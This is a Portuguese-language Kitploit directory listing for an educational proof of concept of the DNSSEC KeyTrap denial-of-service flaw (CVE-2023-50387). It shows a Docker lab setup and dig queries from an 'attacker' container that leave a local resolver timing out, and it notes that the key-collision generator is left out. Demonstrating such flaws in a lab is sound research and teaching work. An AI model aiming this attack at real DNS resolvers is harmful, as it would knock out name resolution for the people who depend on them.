Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-50387 — Prova de conceito educacional para a vulnerabilidade DNSSEC KeyTrap (CVE-2023-50387) com um ambiente de laboratório baseado em Docker para demonstrar ataques de complexidade algorítmica em resolvedores DNS. | Kitploit
Ferramentas/GitHubGitHub/knqyf263/cve-2023-50387
Análise de VulnerabilidadesExploraçãoSegurança de RedeAprendizado e EducaçãoAnálise de DNSLabs e Prática
GitHubknqyf263/cve-2023-50387

CVE-2023-50387

Prova de conceito educacional para a vulnerabilidade DNSSEC KeyTrap (CVE-2023-50387) com um ambiente de laboratório baseado em Docker para demonstrar ataques de complexidade algorítmica em resolvedores DNS.

Ver Repositório
45104há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-50387

KeyTrap no DNS (CVE-2023-50387)

Este repositório é para fins educacionais. O número de chaves e assinaturas foi intencionalmente mantido baixo para evitar seu uso em ataques reais, e um script para gerar chaves em colisão não está incluído.

Teste

network

Configurando o ambiente PoC

root@kitploit:~
$ docker compose up --build

Confirmando que o DNSSEC funciona

root@kitploit:~
$ docker compose exec -it attacker dig @10.10.0.3 a.a.test

; <<>> DiG 9.18.24 <<>> @10.10.0.3 a.a.test
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 44249
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;a.a.test.                      IN      A

;; ANSWER SECTION:
a.a.test.               86400   IN      A       10.10.0.4

;; Query time: 30 msec
;; SERVER: 10.10.0.3#53(10.10.0.3) (UDP)
;; WHEN: Sun Feb 18 22:01:01 UTC 2024
;; MSG SIZE  rcvd: 53

Acionando o KeyTrap

root@kitploit:~
$ docker compose exec -it attacker dig @10.10.0.3 www.a.test
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out

; <<>> DiG 9.18.24 <<>> @10.10.0.3 www.a.test
; (1 server found)
;; global options: +cmd
;; no servers could be reached
root@kitploit:~
$ docker compose exec -it attacker dig @10.10.0.3 b.a.test
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out

; <<>> DiG 9.18.24 <<>> @10.10.0.3 a.a.test
; (1 server found)
;; global options: +cmd
;; no servers could be reached

Referências

  • https://www.athene-center.de/en/keytrap
Baixar ferramenta